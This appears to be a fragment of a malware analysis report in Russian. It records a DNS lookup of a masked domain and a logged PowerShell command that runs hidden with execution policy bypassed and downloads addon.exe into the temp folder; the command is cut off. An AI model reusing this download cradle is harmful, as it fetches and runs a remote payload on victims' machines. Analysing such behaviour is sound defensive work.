Техническая информация
- DNS ASK re####ldmail.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -command try{$down = New-Object System.Net.WebClient;$url = 'HTTP:/'+'/'+'www.re####ldmail.com/dl/addon.exe';$file = $env:temp + '\addon.exe';$down.D...' (со скрытым окном)